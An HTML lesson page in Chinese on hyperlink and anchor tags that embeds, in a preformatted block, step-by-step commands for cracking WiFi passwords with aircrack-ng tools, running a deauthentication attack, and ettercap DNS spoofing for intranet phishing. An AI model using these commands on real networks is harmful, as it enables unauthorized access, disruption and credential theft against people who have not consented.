<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>超链接标签</title>
</head>
<body>
<!--
一、超链接:可以从一个页面跳转到另一个页面
1.使用a标签创建超链接
2.超链接的属性
href:用于指定跳转到目标页面的地址
target:用于指定以什么方式打开页面
可选值:
_self:当前窗口打开,默认值
_blank:新窗口打开
-->
<!--1.外部页面链接-->
<a href="http://www.baidu.com">百度一下</a>
<a href="http://www.baidu.com"target="_blank">百度一下</a>
<!--2.内部页面链接-->
<a href="./8、图片标签.html">内部页面链接</a>
<a href="/web/3、语义化标签.html">语义化链接</a>
<!--3.空链接-->
<a href="#">无指定页面,跳转到当前页面</a>
<!--4.下载链接:若链接的路径是一个文件,则下载链接-->
<a href="./photo/1.zip">下载链接</a>
<!--5.给其他网页元素添加超链接。如:图片、表格等-->
<a href="http://www.baidu.com"><img src="./photo/1.jpg"title="点我进来看看我"></a>
<!--
6.锚点链接:跳转到当前页面中的指定位置
目标标签添加一个属性 id="指定的名称"。注意:id不能重复
超链接 href 属性值为 "#指定的名称"
-->
<a href="#hh">去哈哈</a>
<br>
<a href="#ww">去哇哇</a>
<pre>
1.KALI系统的WIFI破解
1.ifconfig 查看你的网卡是否连接成功
2.airmon-ng start wlan0 开启网卡监听
3.成功开启网卡监听
4.airodump-ng wlan0
扫描网卡后项目的介绍
BSSID 代表我们wifi的mac地址
PWR 代表WIFI信号强度,值越小,信号强度就越高
CH 表示工作的信道号
ESSID WIFI名词
5.airodump-ng -c 6 -w 1 --bssid 你找到的wifibssid wlan0 抓取wifi连接数据包
6.字典地址:cd /usr/share/wordlists
7.ls -l 查看rockyou.txt.gz
8.gzip -d rockyou.txt.gz 解压字典文件
9.开始尝试破解wifi密码
10.aircrack-ng -w /usr/share/wordlists/rockyou.txt 1-01.cap
<h1 id="hh">定位一下</h1>
反认证攻击:
1. airodump-ng wlan0mon 扫描出WIFI列表
2. 记录要攻击的WIFI BSSID
3. 输入命令 airodump-ng -c [CH] --bssid [BSSID] -w [网卡名称] 输入完成后先不要敲击回车
4. 新建一个终端 敲击命令 aireplay-ng -0 0 -a [BSSID] [网卡名称]
5. 先启动第三步的命令,在启动第四步的命令
<h2 id="ww">再定位一下</h2>
2.内网DNS欺骗,钓鱼
(在开始使用前,先把前端页面的JS文件访问IP修改为你自己的IP)
1.ettercap -G 打开工具
2.route 查看当前主机网关
3.ipconfig windows查看ip
4.添加网关到Target1 添加目标IP地址到Target2
5.选择DNS欺骗插件 dns_spoof
6.修改ettercap工具的dns解析文件 vim /etc/ettercap/etter.dns 在末尾添加 * A 192.168.3.34
7.开始攻击
8.java -jar zhou-0.0.1-SNAPSHOT\(1\).jar
9.访问回显页面:192.168.3.4:8080/list
</pre>
<a href="#">回到顶部</a>
</body>
</html>
版权属于:
yu
作品采用:
《
署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)
》许可协议授权
评论 (0)